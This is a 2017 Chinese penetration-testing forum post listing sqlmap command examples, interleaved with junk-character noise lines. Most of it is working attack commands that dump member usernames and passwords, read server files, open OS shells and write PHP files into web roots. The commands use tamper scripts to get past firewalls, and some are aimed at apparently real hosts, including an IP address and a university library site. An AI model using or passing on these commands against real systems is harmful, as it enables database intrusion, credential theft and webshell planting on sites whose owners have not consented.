中国网络渗透测试联盟
标题:
sqlmap使用实例
[打印本页]
作者:
admin
时间:
2017-5-19 17:03
标题:
sqlmap使用实例
/pentest/database/sqlmap
, e+ l4 |) f9 Z0 O6 L9 a
( m" [' R5 K2 w
update :::::> in the folder after execute following order : svn update
" B7 }+ s# |* X9 ?/ p
* y! a7 V+ w' P/ W
sqlmap.py -r 1.txt --current-db
2 q- C6 m3 C- j6 N5 K
2 ~; b. n5 |9 P: G C( r: [6 j
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
_! p/ t# r" `
0 k- R4 G; h* w1 x$ a
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
0 `. A: @0 Z1 _5 |* r' E v
猜解数据库
, _3 `$ n6 H& p3 h
./sqlmap.py -u "injection-url" --dbs
8 g$ }1 r, U7 n" v" n
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
" N7 e7 Z* j) h1 Q
) X O. e9 u/ t1 s; Y" G" i% q
猜解表名
- o9 u$ O$ V/ l% W- x$ j
./sqlmap.py -u "injection-url" -D database_name --tables
' }: U0 S$ h* X- t
5 l9 w: J$ O# w- e0 S" T; ?3 X1 I
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
$ v1 b' I& |1 q7 b; f1 l( @! w
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
6 Q* y& I" K, g
" V4 ~$ t" W i( x. B( G5 k! W
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
8 m7 A, a% ?- e9 O8 ~
B7 X; O1 c7 v% E" l( k/ A8 |
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
+ E8 o% |; J/ p3 E" w2 A
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
1 v: |- I8 S+ c4 O" F' W
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
# J( i0 v$ E9 x$ y0 w5 c0 J
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
, ^: }( W) G5 } k: l$ f
1 A$ Y3 C% W3 h8 Q& \0 @
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
: P+ q2 x$ s# N! X! F Z/ x
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
' p" T. h5 M# M- B t4 Q+ ?
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
1 |/ x% k+ w3 y( y! a N
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
: ?/ z* J# c" P' |9 ?9 F: v# `
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
* w, a8 G+ S7 X/ O4 o
- T" G9 L3 M" z7 {4 P$ ?8 B, L
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
9 t" h( i) w& c' `% ?
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
D2 [3 a+ {& L' K0 x4 M3 j
. O7 Z+ U% E- X' g5 j7 P
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
: M$ P8 K& K9 x, U% y
猜解列名
# E* S+ h, M n0 k# a
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
2 ?; J) |; \, S& w, o3 W
( D, n* q9 C* i- l* J$ Z# [0 o
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
1 n3 ]+ R; F8 O0 b! f1 E9 q9 B
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
7 ^8 @1 p: M' \0 Z
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
; E. X. g; `8 v+ \' [4 R8 ~
: J q! W0 V% e
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
/ c O4 x1 K) w; c2 E
&submit=Go
" @9 T" r. H, s8 T- p: k
猜解值
# u; `8 a( f- Q( x- v
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
3 C$ B; Y7 s7 Q# O* a
========================================================
. T1 Z2 d7 X& A' ]# I4 v
搜索表名中包括mana字符的
5 q& {. f* `2 \7 w9 G; c! _, x
/sqlmap.py -u "injection-url" -T mana --search
' l% B5 n4 f. @0 _
返回一个交互式sql shell
' c6 d, G) |& |$ p3 {# x$ h
/sqlmap.py -u "injection-url" --sql-shell
4 j* ^- \6 N/ |$ { N4 }
读取指定文件(需权限)
' L. e0 D3 U) j% g1 G
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
1 _& n( R' G9 D
查看当前 用户 及 数据库
; a0 F. M7 _9 s# t j' l
/sqlmap.py -u "injection-url" --current-user --current-db
' M$ {9 ^6 l& f; W' l
本地文件 写入 远程目标绝对路径
" @ a% D7 J* U Z4 O
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
; O- |: d# E m
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
5 }0 ]4 z: C. p& ^3 _+ f/ Y% A
! E4 e8 @* y, O# D0 U
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
& S% w2 w" v1 V
查看某用的权限
( h+ Q8 h( C- [8 p0 ^
/sqlmap.py -u "injection-url" --privileges -U root
# @5 Y' K$ C" I7 {5 s& y2 [5 j
查看当前用户是否为dba
7 J; w: p0 E k2 j
/sqlmap.py -u "injection-url" --is-dba
8 Q. `6 W# A: x* i$ `
读取所有数据库用户或指定数据库用户的密码
1 B- K4 c! P7 F/ @; g% b1 g/ `" X
sqlmap.py -r 1.txt --users --passwords
, `) ?- d+ B: O8 V
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
& o, B5 M/ Y( `' G- S
, u3 c$ L5 }# W M& W
/sqlmap.py -u "injection-url" --passwords -U root
' k$ _+ p9 @9 g9 k9 \
6 s( B: B) l0 S
--start&&--stop 与 --first&&--last 的区别
4 T# U: O' R5 K+ Y- j$ |
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
J' R+ U; c! n! S
2 ]; g' l1 H* v/ N
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
9 ^# O, r/ R4 e: U
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
1 z$ u% h9 I1 {3 [% b! h1 [
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
! l! h/ f* ~0 _
, j+ {' g* G! }8 l9 D/ g9 m" g
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
. X, _' [% \" f( b
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
) }! ~4 ~& ?8 d9 F3 E
9 d% D7 t( S" T/ Z; _
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2